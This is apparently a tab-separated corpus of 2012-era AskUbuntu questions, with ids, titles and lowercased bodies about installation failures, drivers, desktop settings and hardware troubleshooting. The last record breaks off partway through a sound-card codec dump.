146383	`` error 1962 : no operating system found ''	brought a new think centre edge 71 because the lenovo thinkcentre edge71 desktop has been awarded the status of certified for ubuntu . source . spent the the past 2 days trying to get any ubuntu 12.04 64bit to install and boot . all give me the same answer : error 1962 : no operating system found here are a few of the links i 've tried : just installed ubuntu 12.04 . when booting , all i get is a black screen with cursor . some of the links report to solve the problem . none have worked . http : //ubuntuforums.org/showthread.php ? t=1901748 is there a relative simple way to install and boot ubuntu 12.04 64bit on a think centre edge 71 ? ? i mean it is certified for ubuntu ?
146384	deleting a file owned by root	recently , a friend played a prank on my pc and now i have a file sitting on my desktop called 'hardcore_porn_xxx ' . the problem is it does not go away by a simple delete . i 'm new to linux so any help will be appreciated . thanks by the way , could this be related to file permissions or something ? hmm @ hmmm~ $ ls -l total 0 -rw-r -- r -- 1 root root 0 2012-06-04 21:01 hardcore_porn_xxx
146385	how to add a link to unity bar	i have a link ( shortcut ) in desktop pointing a folder in my file system . i would like to know is there a way to add that link to the launcher on left in ubuntu 12.04 ?
146395	12.04 lts with malfunctioning wifi wlan , how to fix it ?	12.04 wifi wlan is not getting connected or very poor connection although showing some connection . what is the solution ? update i feel i solved the problem already , please , see the answer . anyway , you can see the `` sudo lshw -class network & > specs '' here for the wireless of the x220 thinkpad -laptop .
146401	add carriage return after ctrl+c	when i kill a process in the terminal using ctrl+c no carriage return is inserted . i have no idea if i changed a setting inadvertently or what happened . i 'm running 11.10 . how can i change the settings so that a carriage return is added after ctrl+c ?
146407	setting up email for drupal application for linode 12.04	i 've installed ubuntu server 12.04 with linode . what do i need to install to allow my application to be able to send email in and out ? or is this package natively setup with ubuntu 12.04 ?
146411	kubuntu 12.04 runs slowly	i have a 3ghz amd 64 dual core am3 socket processor , asus mom board , 4gb ram , 8800gts nividia video card with 500mb ram . installed kubuntu 12.04 and very laggy . select menu and 20 seconds later the menu pops up . i switched to classic menu and that seemed to help . what direction should i look first to get this running better ? video perhaps ? i had ubuntu 11.04 on this machine previously and had no problems with speed .
146415	inkscape does n't open on ubuntu 12.04	it starts and appears on system monitor , but it does n't open any window ... any solution ? i 'm using : inkscape 0.48.3.1 r9886 ( mar 29 2012 ) ubuntu 12.04 32bits - using gnome-shell
146417	installation does n't work on a lenovo ideapad g570	the issue i 'm having is that every time i try to install ubuntu on my brand new lenovo it just crashes and one timr corrupted grub it 's getting extremely annoying and i need help
146420	kubuntu 12.04 wo n't let me search for wireless network	hello i 'm running a brand new kubuntu 12.04 single boot on my laptop , this is the first time i tried connecting to a wireless network . i tried using the network manager app allready on the task bar , but it does n't let me tick the column to search for wireless networks , i.e . it will untick it automaticaly , it 's dissabled by the software or the hardware , but i doubt it . i 've tried searching the other questions on this site , and i ca n't see anything which helps with my problem . i know my wireless card is a atheros ar9285 , i do n't think i installed any firmware for it , i 'm sorry i ca n't offer more info but i 'm completely new to networking and all that i have for the network to connect to are it 's name and password of course .
146425	how can i install and download drivers without internet ?	i have recently installed ubuntu 12.04 lts , but as in previous versions ; i need a driver for wireless . when booting from usb , i could download and install the broadcom wireless sta driver : now i ca n't ( note : this was from my house and i am moving and the internet in my hotel has additional logon information - might be the problem ? ) . the ethernet cable on my laptop never worked , so that 's not an option . when i open additional drivers , it will say ca n't detect drivers ; need internet access . summary : need wireless driver wifi is available ; logon information in browser required . no ethernet
146429	how to install internet explorer with windows media player plugin via wine ?	i have installed internet explorer in ubuntu 10.10 with the help of wine and winetricks . however , when i play an audio file in internet explorer its not getting played . instead , it shows a empty square box . so , is it possible to install windows media player via wine ? if yes please help me with installation steps . so that i can play audio files in internet explorer . if not , is it possible to change the player of internet explorer so that the audio files will get played in another player ? thanks in advance .
146431	how to install remastersys ?	i want to install remastersys , but i get the following error : $ sudo apt-get install remastersys reading package lists ... done building dependency tree reading state information ... done e : unable to locate package remastersys searching for remastersys in software center also does n't give proper results : i have tried following these instructions and have added software sources as shown in the following screenshot , but i still get the same error :
146432	is there a way to do scp in parallel to multiple systems ?	is it possible to copy a file parallely to all the systems simultaneously ? like @ a time the file should be copied on all the machines ...
146434	internal error with xorg	i 've got a new system and am experiencing instability with it , so in need of narrowing down possible causes . after updating the bios , i still experience lockups . so i 'm now running with just 1 harddrive installed and am wanting to see if that helps things or not . now my specific question today is an issue seen in powering up things this morning . i ran into this error msg popped up `` ubuntu 12.04 has experienced an internal error '' and it was assocated with /usr/bin/xorg . consulting older questions asked about this , i examined the /var/log/xorg.0.log file but did not see any error lines ( ee ) . just wondering if people have suggestions on things to try , files to examine , or just what i might try to do to further debug this . i think my system is working fine now , even with this happening , but one never likes to see errors like this . thanks
146437	just installed 12.04 and it freezes when i try logging in	i just installed ubuntu 12.04 alongside windows 7 on an acer aspire 1 with amd dual-core c60 , 4 gb ram , and 320 gb hdd ( 100 gb partitioned for ubuntu ) . after restarted my computer , i was able to log in fine but when i tried to log in again after shutting my netbook off , it began to freeze on the log in screen . the freezing occurs several seconds after i 'm prompted to enter my password . even if i enter the password before the freezing occurs , i end up getting stuck while it 's loading or something . i 'm new to ubuntu so i have no idea what to do . also , before it gets to the log in screen , it says something like this : ntfs5 : no wubildr ntfs5 : no wubildr ntfs5 : error : `` prefix '' edit : it was wubildr , not unbilder . also , the freezing seems to be inconsistent
146445	compiling unify.c for logitech wireless keyboard and mouse error - how to use both the keyboard and mouse on the same receiver ?	i bought this logitech wireless keyboard k360 and this logitech wireless mouse m505 i am trying to use both on the same receiver , but so far i ca n't figure it out ! i have tried this but i do n't know how to compile it ! if i paste ' gcc -o unify unify.c ' in the terminal , then i got this : gcc : erreur : unify.c : aucun fichier ou dossier de ce type gcc : erreur fatale : pas de fichier à l'entrée compilation terminée . translated ( edited ) gcc : error : unify.c : no such file or directory that type gcc : error fatal : no input file to compile is complete .. sorry it is in french ( edited ) . it says no files of this type and no file in the input ... can anyone tell me how to compile it and then find my hidraw devices ? ? thanks
146449	can i install hurd in ubuntu ?	i was thinking that , if ubuntu is based on debian , and debian has the gnu hurd , why there 's not an ubuntu gnu/hurd ? is there a possible way to install gnu/hurd in ubuntu ? thanks
146456	ca n't restore unity desktop	i 'm having this problem . tried this : $ unity -- reset this command hangs up on 'setting update `` run_key '' ' also tried this : $ ccmd unity plugin was disabled . i enabled it and rebooted . but still no luck . also tried this : $ rm -rf ~/.config/compiz-1/compizconfig/* $ rm -rf .compiz-1 $ sudo apt-get purge compizconfig-settings-manager nothing happened . also tried this : $ sudo apt-get install -- reinstall ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 0 b/3,928 b of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 164812 files and directories currently installed . ) preparing to replace ubuntu-desktop 1.267 ( using ... /ubuntu-desktop_1.267_amd64.deb ) ... unpacking replacement ubuntu-desktop ... setting up ubuntu-desktop ( 1.267 ) ... it did n't work . any ideas ?
146463	is there a way to recover a drivelock password ? or reformat the drive ?	one of the kids put a drivelock password on one of the hard drive laptops in our ubuntu lab . i tried removing the drive and reformatting it via usb to make it usable , but it does n't even show up as a drive or partition . however it does show up as /dev/sr0 however it says there is no media detected when you try to do something to it .
146465	how can i clear history and settings for the remote desktop viewer ( vinagre ) ?	how do i clear all the settings for vinagre to take it back to a brand-new , virgin state ? i accidentally typed a connection in wrong and i can not figure out how to delete it . also some of my connections are not working correctly and i think that if i could flush the whole thing clean it might fix those issues . i have tried uninstalling and reinstalling , but it remembers the previous settings/connections .
146466	why i 'm seeing 7 users , a abnormal usage of virtual memory , lots of stream connections and all process sleeping ?	using a toshiba satellite l645d s4025 amd dual core p320 2.1ghz 3gb ddr3 ram 250 gb hdd below is the incomplete top report ( do n't know how to select all to copy ) using an ubuntu 12.04 amd64 install/live dvd recently uninstalled ubuntu 12.04 due to the fact that the processes ( which in most cases there were 4-5 of each process running ) were all using close to the same virtual memory listed above . ( possible fork bomb ... i was ignorant enough to trust instructions that a later read i should n't have ( wget http ) do n't remember the whole string . i had no issues with performance due to the fact that the processes were n't using much physical ram and were not using any swap . as of now i reformatted the hdd and have not assigned swap for my live session . is this normal virtual memory usage ? do i need to set disk cache size ? ( have n't been able to find much on disk cache ) i have read many posts but nearly all are problems with physical memory , swap space ( file ) , or swap partition . top - 18:46:34 up 1:22 , 7 users , load average : 0.69 , 0.83 , 0.85 tasks : 161 total , 1 running , 160 sleeping , 0 stopped , 0 zombie cpu ( s ) : 15.8 % us , 6.6 % sy , 0.0 % ni , 77.6 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2816560k total , 2263988k used , 552572k free , 269668k buffers swap : 0k total , 0k used , 0k free , 1297120k cached pid user pr ni virt % mem res shr s % cpu time+ command 3544 ubuntu 20 0 1272m 2.9 79m 36m s 1 0:32.63 compiz 3571 ubuntu 20 0 1150m 1.0 27m 17m s 0 0:01.31 nautilus 2265 root 20 0 1018m 0.1 3940 2744 s 0 0:00.13 console-kit-dae 3910 ubuntu 20 0 1015m 0.4 11m 7724 s 0 0:01.12 unity-applicati 3916 ubuntu 20 0 1002m 0.2 6600 5200 s 0 0:00.14 unity-files-dae 3572 ubuntu 20 0 866m 1.0 27m 13m s 0 0:02.56 nm-applet 3374 ubuntu 20 0 834m 1.0 28m 12m s 0 0:02.54 gnome-settings- 3986 ubuntu 20 0 808m 0.6 17m 8588 s 0 0:00.30 unity-scope-vid 3914 ubuntu 20 0 800m 0.3 8532 6400 s 0 0:00.10 unity-music-dae 4128 ubuntu 20 0 742m 3.5 97m 34m s 0 1:57.77 firefox 3778 ubuntu 20 0 702m 0.2 4820 3404 s 0 0:02.09 hud-service 3725 ubuntu 20 0 698m 0.3 7324 5708 s 0 0:00.07 indicator-datet 3952 ubuntu 20 0 654m 0.2 4320 3500 s 0 0:00.04 unity-musicstor 3726 ubuntu 20 0 649m 0.2 6488 4880 s 0 0:00.09 indicator-messa 3728 ubuntu 20 0 631m 0.4 9.9m 7484 s 0 0:00.07 indicator-print 3716 ubuntu 20 0 601m 0.7 20m 11m s 0 0:03.88 unity-panel-ser 3731 ubuntu 20 0 599m 0.2 6900 5380 s 0 0:00.08 indicator-sound 3729 ubuntu 20 0 598m 0.2 6000 4676 s 0 0:00.07 indicator-sessi 4356 ubuntu 20 0 593m 0.6 17m 11m s 0 0:02.96 gnome-terminal 7 users ? is this correct for a live dvd ? i believe i only had 2 users : root and my username when running from my hdd before the format . ( i could be wrong ) ubuntu @ ubuntu : ~ $ who ubuntu tty5 2012-06-04 17:25 ubuntu tty6 2012-06-04 17:25 ubuntu tty2 2012-06-04 17:25 ubuntu tty4 2012-06-04 17:25 ubuntu tty3 2012-06-04 17:25 ubuntu tty1 2012-06-04 17:25 ubuntu pts/0 2012-06-04 17:32 ( :0.0 ) ubuntu @ ubuntu : ~ $ sudo ufw status status : active to action from -- -- -- -- -- -- 22 deny anywhere 631 deny anywhere 22 deny anywhere ( v6 ) 631 deny anywhere ( v6 ) ubuntu @ ubuntu : ~ $ sudo ufw app list available applications : cups ubuntu @ ubuntu : ~ $ sudo ufw app info cups profile : cups title : common unix printing system server description : cups is a printing system with support for ipp , samba , lpd , and other protocols . port : 631 netstat -ap ( had to remove too long for the post ) shows appx 100 connections mostly stream ... and about 7 listening which seems bad to me any help there would be appreciated also . only 1 running process ( top ) ? is it normal for all processes to be sleeping ? i 've tried to include as much info as i could ( limited on what i am allowed to post ) , if there is anything else i should check please let me know ... i want to reinstall ubuntu 12.04 any tips would be helpful .
146469	kernel panic : `` machine check : processor context corrupt '' after install	i am new to linux and i am having issues installing . i have tried multiple versions and all seem to give me the same issue . the livecd worked and i used it to install ubuntu alongside windows 7 . here 's a few screen shots of what i get . i am currently trying to install most the most recent version of ubuntu . system specs : x58 motherboard 12gb ram core i7 processor 2 nvidia gtx 580 video cards in sli configuration thanks in advance and please feel free to simplify your answers as i am pretty new at this .
146471	how to change bluetooth device name permanently ?	any ideas ? i saw this question , but name is ubuntu-0 again after reboot and after switching of bluetooth
146472	is there a native picasa version for linux ? how can i install it ?	how can i install google picasa 3.9 or whatever the latest version is . i do n't want the wine version , i want the native linux version . i 'm trying to avoid using programs via wine because it is very buggy .
146488	gui-less music player with auto-updating library	i 've reached the point where i want to write my own music player ( it comes to us all ) . however , all the things i want to do are ui-based ; it would be daft for me to have to reimplement managing a library , reading id3 tags , creating playlists , and so on . therefore , what i 'm looking for is a music player which does n't present a ui ( or can have that ui hidden ) so that i can implement my own entirely custom ui without having to build all the infrastructure as well . this `` underlying '' music player might be a curses interface with a remote control socket protocol ; it might be a library with python bindings ; it might be a gtk app which takes an option to not present its gui and can be controlled over d-bus ... i do n't know . things i non-negotiably want this `` back end '' to do : be remote-controllable from a python program . ( as mentioned , i 'm open to lots of methods of remote control ; a socket , d-bus , a cli tool , whatever ) maintain a library of music - that is , scan my music for metadata and be able to address music by that metadata ( so i can search for `` beatles '' and find tracks , not just those which match on the filename ) monitor a folder for changes and load those changes ( new files , altered files , deleted files ) into the library without having to be told to do so let me provide my own gui ( hence the need for remote-controllability ) things i 'd really , really , really like but which are n't strictly necessary : ubuntu sound menu integration be packaged for ubuntu already and in software centre i 've looked at a few alternatives and rejected them , but i might be wrong : if i 'm wrong about any of these , do please correct me . cmus : can not monitor the library for changes ( needs to be prodded with update command ) . also , afaict the remote control is primarily to make the curses interface do things ; it 's hard-to-impossible to use the remote control to say `` give me a list of all songs matching 'beatles ' '' mpd ( and some client ) : can not monitor the library for changes ( needs to be prodded with `` update '' command ) moc : can not monitor the library for changes banshee ( and banshee 's back end , nereid ( ? ) ) : as far as i can tell , ca n't be controlled by a python program : i 'd need to write my new front end in c # rhythmbox , guayadeque , audacious , quodlibet , clementine , noise , beatbox , deadbeef , gmusicbrowser , xnoise : ca n't turn the gui off and replace it with my own so , i 'm looking either for explanations of how to do what i want with the above , or suggestions for alternative tools that i could use instead of those !
146493	adding liebert ups ( uninterrupted power supply ) psi range	i have an liebert powersure psi line-interactive ups , 1000va and using ubuntu 12.04 lts . i 've used it on windows and it came up as and notebooks battery . is there support for these type of devices ? i 've tried the multi link software on the emerson site and found ml_36_004_linux_x86.bin which would be the software when using the 2.4.18+ kernel . is it possible to use this file ?
146494	how do i get an canon pixma mp150 to print ?	i succesfully installed my canon pixma mp150 printer ( and scanner ) in ubuntu 12.04 , made it the default printer , but i can not print anything . watching the printing queue , i see that the printer receives my documents but just for a few seconds after which the queue gets empty without anything getting actually printed . i tried to print from large pdf 's to quite tiny txt files . i reinstalled the printer from cups web-based interface ( 127.0.0.1:631 ) but again , no luck . any ideea on the matter ?
146498	software center gives me an `` error scanning the cd : could not find a suitable cd ''	i am getting the `` could not find a suitable cd '' error every time i open software sources in order to add a ppa . a picture can be found below : how do i solve this problem ? i am using ubuntu 12.04
146507	is it possible to recover unflushed data from the disk/page cache ?	in ubuntu , i move some file to a usb stick , using mv dir/file /media/7exxx/swap/ . when finishing this , i forget to `` safely remove '' before physically removing usb stick . now , the file is not shown in usb . is it possible to retrieve data not yet written to usb ( which i assume resides on page/disk cache ) .
146508	how do i remove the `` did you mean ... '' feature in the shell ?	when i fail to type correctly a command , for example : luca @ mostro : ~ $ sido no command 'sido ' found , did you mean : command 'sudo ' from package 'sudo ' ( main ) command 'sudo ' from package 'sudo-ldap ' ( universe ) command 'sid ' from package 'tendra ' ( universe ) sido : command not found the command interpreter try to guess what program i wanted to run . this is very annoying to me ( i associate it to google behavior ) . is it possible to remove this feature ? and how ? i supposed that it were setup in my local ~/.bashrc , but the fast-check failed miserably ...
146511	how to check if your home folder and swap partition are encrypted using terminal ?	i installed ubuntu 12.04 a few days ago but strangely i seem to have skipped the part about choosing to encrypt home folder . now if it is encrypted i do not know what is the encryption key . how do i check if it is really encrypted ? ( and also the swap partition ) .
146515	font gets enlarged when rotating screen	i have a new thinkpad x220 tablet with kubuntu 12.04 . when i rotate the screen 90째 with a script , the fonts of all programs that i open after the rotation have ugly huge fonts . # ! /bin/sh # find the line in `` xrandr -q -- verbose '' output that contains current screen orientation and `` strip '' out current orientation . rotation= '' $ ( xrandr -q -- verbose | grep 'connected ' | egrep -o '\ ) ( normal|left|inverted|right ) \ ( ' | egrep -o ' ( normal|left|inverted|right ) ' ) '' # using current screen orientation proceed to rotate screen and input tools . case `` $ rotation '' in normal ) # rotate to the left xrandr -o right xsetwacom set `` wacom isdv4 e6 pen stylus '' rotate cw xsetwacom set `` wacom isdv4 e6 finger touch '' rotate cw xsetwacom set `` wacom isdv4 e6 pen eraser '' rotate cw ; ; right ) # rotate to normal xrandr -o normal xsetwacom set `` wacom isdv4 e6 pen stylus '' rotate none xsetwacom set `` wacom isdv4 e6 finger touch '' rotate none xsetwacom set `` wacom isdv4 e6 pen eraser '' rotate none ; ; esac
146516	how to find what particular fonts are used for the system gtk theme in xubuntu ?	some non-native applications ( say intellij idea ) use ugly fonts instead of those the whole system does . i 'd like to configure them manually but i do n't know what particular font ( there are so many ... ) and size to choose to match my system theme . where can i look them up ? i use xubuntu 12.04 with xfce 4.10 .
146522	why the cryptographic key was not provided at ubuntu 12.04 first run ?	so i installed ubuntu 12.04 a few days ago and strangely i missed the part where we choose to encrypt home folder . however i already ran the commands on this question ( how to check if your home folder and swap partition are encrypted using terminal ? ) to check if home folder and swap partition are encrypted and they are . so why is that ubuntu did not provide me the cryptographic key the same way it happened when i installed ubuntu 11.04 ? ? ?
146524	recover files from ntfs drive with bad sectors	a few nights ago i have created a backup of my data on an external 500 gb ntfs usb hard drive . i have then formatted my computer , reinstalled ubuntu and started transferring back the data from the external hdd . unfortunately some files have became corrupted and ubuntu is unable to copy them over . the same issue happens if i login using windows 7 . disk utility detects with smart that there are `` a few bad sectors '' . some of files are perfectly intact , but other files can not be accessed ( nor read , copied ... ) although they are displayed within nautilus and show the correct file size . is there anything i can do to recover this data ? i have thought of using testdisk but this utility seems more useful for repairing lost partitions or deleted files . i have also thought of using ddrescue so i could at least have a low level copy of the disk but i am not sure what use to make of it in order to recover the data ! ! !
146525	how can i download the source code for linux-image-3.2.0-*-generic ?	the directions at ubuntu wiki apt-get source linux-image- $ ( uname -r ) and askubuntu question where can i find the source code for the ubuntu kernel ? do n't workâś sudouser @ 64bitws : ~ # uname -r 3.2.0-24-generic and sudouser @ 64bitws : ~ # apt-get source linux-image-3.2.0-24-generic reading package lists ... done building dependency tree reading state information ... done picking 'linux ' as source package instead of 'linux-image-3.2.0-24-generic' e : unable to find a source package for linux
146529	how to connect mtp devices via usb ?	how does one connect an mtp device to ubuntu via usb ? many popular devices , such as all android 4.0 phone , have only mtp or ptp as a connection option , no usb mass storage anymore . considering the popular samsung s3 : connecting as either mtp or ptp : neither allows one to see pictures saved as default by phone camera to dcim folder on external sd card . similar problems with previous models ( with android 2.x ) were solvable by 'usb utilities ' in wireless & networking settings , but this is no longer present in android 4.0 .
146530	is this ppa safe and will it work ?	sudo add-apt-repository ppa : anton0/unity sudo apt-get update sudo apt-get upgrade # reboot gconftool-2 -s -- type boolean /apps/compiz-1/plugins/unityshell/screen0/options/menu_always_visible true it 's supposed to stop the global menu from fading away however i 've never seen anyone use such a thing before so i do n't know if it 's even possible or if this is fake or something .
146535	which recent ubuntu should i use for matlab r2011a , octave 3.6.1 and recent r ?	i wish to install ubuntu on a new machine 64 bits . can you help by telling me which most recent ubuntu will be compatible and stable with matlab ( r2011a ) , and a recent octave ( 3.6.1 ) , and a recent r , all that in 64bits ? do you advise ubuntu 11.10 or 12.04 ?
146537	possible to migrate from non-raid to raid 1 and then raid 5 ?	using software raid only is it possible to start with a 2tb disk full of data and safely add it to a raid 1 array ? is it then possible to add a third disk and migrate the raid 1 array into a raid 5 array ? or is it possible to start with a 2 disk degraded raid 5 array and then add the third disk later to create a health raid 5 array ? backstory : i wish to migrate from a 2 disk nas ( raid 1 ) to a 3 disk nas and only purchase one new disk in doing so
146539	how can i remove the mail icon and drop-down menu from the ubuntu 12.04 task bar ?	i 'm using ubuntu 12.04 . is it possible to completely remove the 'mail ' icon + drop-down menu from task-bar ? if you can remove the menu , will it also remove the software associated with it ? i would rather set up my mail directly in the app , rather than using the menu shortcuts . in addition to removing the menu , i want to completely uninstall/remove the chat software ( i think it 's called empathy ) . is this possible ? thanks .
146540	12.04 black screen crash on flash video with firefox	i just started using ubuntu a few months ago and recently upgraded from 11.10 to 12.04 . after a few minutes of watching any video online ( stumbleupon video , youtube and others ) , i get a black screen . i am unable to do anything , but reboot at this point ( to my limited knowledge ) . so far , i 've tried updating the adobe flash plugin via flash aid ( firefox add-on ) , but that does n't seem to have worked .
146542	sound problem , spikes , help please	i have problem with sound . i have just installed 12.04 64 bit , and sound is so bad , got spikes on sound ( youtube , mp3 , avi ... ) , like when cd have scraches . in the settings analog output is analog stereo duplex . i think that this problem is only on 12.04 and linux mint 13 here is my card info : 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0xfe024000 irq 16 1 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xfdefc000 irq 44 and cat /proc/asound/card*/codec # * : codec : realtek alc888 address : 3 afg function id : 0x1 ( unsol 1 ) vendor id : 0x10ec0888 subsystem id : 0x1458e601 revision id : 0x100001 no modem function group found default pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm default amp-in caps : n/a default amp-out caps : n/a gpio : io=3 , o=0 , i=0 , unsolicited=1 , wake=0 io [ 0 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 1 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 2 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 node 0x02 [ audio output ] wcaps 0x11 : stereo device : name= '' alc888 analog '' , type= '' audio '' , device=0 converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm node 0x03 [ audio output ] wcaps 0x11 : stereo converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm node 0x04 [ audio output ] wcaps 0x11 : stereo converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm node 0x05 [ audio output ] wcaps 0x11 : stereo converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm node 0x06 [ audio output ] wcaps 0x211 : stereo digital control : name= '' iec958 playback con mask '' , index=0 , device=0 control : name= '' iec958 playback pro mask '' , index=0 , device=0 control : name= '' iec958 playback default '' , index=0 , device=0 control : name= '' iec958 playback switch '' , index=0 , device=0 control : name= '' iec958 default pcm playback switch '' , index=0 , device=0 device : name= '' alc888 digital '' , type= '' spdif '' , device=1 converter : stream=8 , channel=0 digital : enabled digital category : 0x0 pcm : rates [ 0x5e0 ] : 44100 48000 88200 96000 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x1 ] : pcm node 0x07 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x08 [ audio input ] wcaps 0x10011b : stereo amp-in control : name= '' capture switch '' , index=0 , device=0 control : name= '' capture volume '' , index=0 , device=0 device : name= '' alc888 analog '' , type= '' audio '' , device=0 amp-in caps : ofs=0x0b , nsteps=0x1f , stepsize=0x05 , mute=1 amp-in vals : [ 0x12 0x12 ] converter : stream=4 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0x6 ] : 16 20 formats [ 0x1 ] : pcm connection : 1 0x23 node 0x09 [ audio input ] wcaps 0x10011b : stereo amp-in control : name= '' capture switch '' , index=1 , device=0 control : name= '' capture volume '' , index=1 , device=0 device : name= '' alc888 analog '' , type= '' audio '' , device=2 amp-in caps : ofs=0x0b , nsteps=0x1f , stepsize=0x05 , mute=1 amp-in vals : [ 0x80 0x80 ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0x6 ] : 16 20 formats [ 0x1 ] : pcm connection : 1 0x22 node 0x0a [ audio input ] wcaps 0x100391 : stereo digital control : name= '' iec958 capture switch '' , index=0 , device=0 control : name= '' iec958 capture default '' , index=0 , device=0 device : name= '' alc888 digital '' , type= '' spdif '' , device=1 converter : stream=0 , channel=0 sdi-select : 0 digital : digital category : 0x0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x1 ] : pcm unsolicited : tag=00 , enabled=0 connection : 1 0x1f node 0x0b [ audio mixer ] wcaps 0x20010b : stereo amp-in control : name= '' rear mic playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' rear mic playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' front mic playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=1 , ofs=0 control : name= '' front mic playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=1 , ofs=0 control : name= '' line playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=2 , ofs=0 control : name= '' line playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=2 , ofs=0 control : name= '' cd playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=4 , ofs=0 control : name= '' cd playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=4 , ofs=0 control : name= '' beep playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=5 , ofs=0 control : name= '' beep playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=5 , ofs=0 amp-in caps : ofs=0x17 , nsteps=0x1f , stepsize=0x05 , mute=1 amp-in vals : [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] connection : 10 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 0x16 0x17 node 0x0c [ audio mixer ] wcaps 0x20010f : stereo amp-in amp-out control : name= '' front playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] amp-out caps : ofs=0x1f , nsteps=0x1f , stepsize=0x05 , mute=0 amp-out vals : [ 0x1f 0x1f ] connection : 2 0x02 0x0b node 0x0d [ audio mixer ] wcaps 0x20010f : stereo amp-in amp-out control : name= '' surround playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] amp-out caps : ofs=0x1f , nsteps=0x1f , stepsize=0x05 , mute=0 amp-out vals : [ 0x1f 0x1f ] connection : 2 0x03 0x0b node 0x0e [ audio mixer ] wcaps 0x20010f : stereo amp-in amp-out control : name= '' center playback volume '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 control : name= '' lfe playback volume '' , index=0 , device=0 controlamp : chs=2 , dir=out , idx=0 , ofs=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] amp-out caps : ofs=0x1f , nsteps=0x1f , stepsize=0x05 , mute=0 amp-out vals : [ 0x1f 0x1f ] connection : 2 0x04 0x0b node 0x0f [ audio mixer ] wcaps 0x20010f : stereo amp-in amp-out control : name= '' side playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] amp-out caps : ofs=0x1f , nsteps=0x1f , stepsize=0x05 , mute=0 amp-out vals : [ 0x1f 0x1f ] connection : 2 0x05 0x0b node 0x10 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x11 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x12 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x13 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x14 [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' front playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' line-out front jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x0000003e : in out hp detect trigger pin default 0x01014410 : [ jack ] line out at ext rear conn = 1/8 , color = green defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=02 , enabled=1 connection : 5 0x0c* 0x0d 0x0e 0x0f 0x26 node 0x15 [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' surround playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' line-out surround jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x0000003e : in out hp detect trigger pin default 0x01011412 : [ jack ] line out at ext rear conn = 1/8 , color = 